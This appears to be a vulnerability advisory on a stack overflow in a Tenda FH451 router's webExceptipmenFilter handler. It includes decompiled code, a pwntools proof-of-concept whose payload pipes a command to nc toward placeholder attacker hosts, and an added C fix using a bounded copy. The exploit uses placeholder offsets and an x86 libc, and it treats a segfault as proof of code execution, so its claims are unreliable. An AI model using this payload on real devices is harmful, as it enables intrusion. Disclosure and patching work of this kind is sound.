### Key Information Summary

#### Vulnerability Overview

- **Vulnerability Type**: Remote Code Execution (RCE)
- **Affected Device**: Shenzhen Jixiang Tengda Technology Co., Ltd. FH451 Router
- **Vulnerable URL**: `http://192.168.100.157:80/goform/webExceptipmenFilter`

#### Vulnerability Analysis

- **Critical Function**: `webExceptipmenFilter`
- **Issue**: No length check is performed on the `page` parameter, leading to a buffer overflow.
- **Code Snippet**:

  ```c
  v3 = webGetVar(s, "page", &unk_81E0B3);
  sub_39A4C("filter.webexcept.en", 126);
  v6 = webGetVar(s, "ipflag", &unk_81E0B3);
  Setvalue("ipgroup_flag", v6);
  strcpy(v3, "add");
  ```

- **Impact**: When the `page` parameter exceeds a safe length, it causes a stack overflow, potentially leading to an application crash or remote code execution.

#### Reproduction Steps

- **Example Request**:

  ```python
  import requests
  from pwn import *

  libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
  system_offset = libc.symbols["system"]
  base = 0x60000000
  cmd = b"echo REVERSECONNECTIONHERE|nc REVERSECONNECTIONIP REVERSECONNECTIONPORT"
  move_r0 = base + 0xdeadbeef
  r_cmd = base + 0xdeadbeef

  url = "http://192.168.100.156:80/goform/webExceptipmenFilter"
  payload = {"page": cyclic(1024) + p32(r_cmd) + p32(move_r0) + cmd}
  res = requests.post(url, data=payload)
  ```

#### Test Results

- **Screenshot Shows**: After sending the crafted malicious request, the target device exhibited connection failure and a core dump (Segmentation Fault), confirming successful exploitation of the vulnerability.

#### Conclusion

This vulnerability arises from improper handling of the `page` parameter in the `webExceptipmenFilter` function. By crafting a specific request, an attacker can trigger a stack overflow, leading to remote code execution. Attackers can exploit this vulnerability to execute arbitrary commands on the target device.
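The fix for the root cause described in the analysis, as an added example (not code from this report or from the FH451 firmware): the `page` value is copied into a fixed-size stack buffer only after its length has been checked against the buffer, so an oversize value is rejected instead of overrunning the stack. The buffer size `PAGE_BUF_LEN`, the function names and the probe helper are assumptions for illustration; the report does not give the real handler's buffer size or API.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical fixed-size destination for the "page" value (an assumption
 * for illustration; the real handler's buffer size is not in the report). */
#define PAGE_BUF_LEN 64

/* Bounded copy: returns 1 and fills dst when src (including its NUL) fits in
 * dst_len bytes, otherwise returns 0 and leaves dst as an empty string.
 * Nothing is ever written past dst[dst_len - 1], so an oversize "page"
 * parameter is refused rather than overflowing the stack buffer. */
int copy_page_param(const char *src, char *dst, size_t dst_len)
{
    if (src == NULL || dst == NULL || dst_len == 0)
        return 0;

    /* Measure the source without reading more than dst_len bytes of it. */
    size_t n = 0;
    while (n < dst_len && src[n] != '\0')
        n++;

    if (n == dst_len) {          /* no room left for the terminator: reject */
        dst[0] = '\0';
        return 0;
    }
    memcpy(dst, src, n + 1);     /* n < dst_len, so the NUL fits as well */
    return 1;
}

/* Models a handler that keeps the parameter in a stack buffer. The vulnerable
 * pattern would be an unbounded copy (strcpy-style) into `page` at this point;
 * here the length check decides whether the request is accepted at all. */
int handle_page_param(const char *src)
{
    char page[PAGE_BUF_LEN];
    return copy_page_param(src, page, sizeof page);
}

/* Builds a constructed "page" value of `len` 'A' bytes and runs it through the
 * handler, to probe the boundary. Returns -1 if the test string cannot be
 * allocated. */
int probe_page_length(size_t len)
{
    char *value = malloc(len + 1);
    if (value == NULL)
        return -1;
    memset(value, 'A', len);
    value[len] = '\0';
    int accepted = handle_page_param(value);
    free(value);
    return accepted;
}

int main(void)
{
    printf("\"add\"      -> %d\n", handle_page_param("add"));
    printf("63 bytes   -> %d\n", probe_page_length(63));
    printf("64 bytes   -> %d\n", probe_page_length(64));
    printf("1024 bytes -> %d\n", probe_page_length(1024));
    return 0;
}
```

The accept/reject decision is made before any byte is written, and the bound is taken from `sizeof page` rather than a separately maintained constant, so the check cannot drift out of sync with the buffer if its size changes. A 1024-byte value, the length used by the reproduction request, is refused outright.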